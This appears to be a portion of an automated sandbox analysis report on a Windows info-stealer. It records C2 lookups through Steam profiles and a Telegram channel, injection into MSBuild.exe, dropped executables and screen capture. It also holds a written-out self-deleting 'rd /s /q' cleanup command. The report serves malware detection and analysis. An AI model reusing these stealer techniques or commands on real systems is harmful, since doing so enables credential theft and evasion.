                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: https://mozilla.org0/
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.n
                          Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/discussions/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                          Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/market/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                          Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                          Source: MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                          Source: MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                          Source: file.exe, file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869f
                          Source: file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/workshop/
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.ste
                          Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/
                          Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/about/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/explore/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/legal/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/mobile
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/news/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/points/shop/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/stats/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                          Source: DBKKFC.4.drString found in binary or memory: https://support.mozilla.org
                          Source: DBKKFC.4.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: DBKKFC.4.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
                          Source: file.exe, file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5ed
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: https://www.digicert.com/CPS0
                          Source: HCAEHD.4.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: HCAEHD.4.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/re
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                          Source: DBKKFC.4.dr String found in binary or memory: https://www.mozilla.org
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2195666046.000000001983B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
                          Source: DBKKFC.4.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/ost.exe
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2195666046.000000001983B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
                          Source: DBKKFC.4.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                          Source: DBKKFC.4.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2195666046.000000001983B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                          Source: DBKKFC.4.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
                          Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49712 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.8:49713 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:56263 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 172.67.166.76:443 -> 192.168.2.8:56266 version: TLS 1.2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040145B GetCurrentProcess,NtQueryInformationProcess
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C8EB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C8EB8C0 rand_s,NtQueryVirtualMemory
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C8EB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C88F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004047E8 appears 38 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6C8C94D0 appears 90 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6C8BCBE8 appears 134 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00410609 appears 71 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004104E7 appears 36 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CAB09D0 appears 99 times
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00617A20 appears 51 times
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: String function: 00AF7A20 appears 51 times
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: String function: 00B24BC8 appears 97 times
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: String function: 00B26AA8 appears 171 times
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 308
                          Source: file.exeStatic PE information: invalid certificate
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: file.exeStatic PE information: Section: .data ZLIB complexity 0.9919468068035944
                          Source: CBFCFBFBFB.exe.4.drStatic PE information: Section: .data ZLIB complexity 0.9911440122377623
                          Source: a43486128347[1].exe.4.drStatic PE information: Section: .data ZLIB complexity 0.9911440122377623
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/32@14/5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8E7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,4_2_6C8E7030
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,4_2_004114A5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,4_2_00411807
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\76561199780418869[1].htm
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3636
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess900
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmp
                          Source: C:\ProgramData\CBFCFBFBFB.exeCommand line argument: MZx13_2_00AF20AD
                          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                          Source: MSBuild.exe, MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                          Source: BGDGHJ.4.dr, GCFBAK.4.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 308
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\ProgramData\CBFCFBFBFB.exe "C:\ProgramData\CBFCFBFBFB.exe"
                          Source: C:\ProgramData\CBFCFBFBFB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Source: C:\ProgramData\CBFCFBFBFB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Source: C:\ProgramData\CBFCFBFBFB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Source: C:\ProgramData\CBFCFBFBFB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 320
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exit
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dll
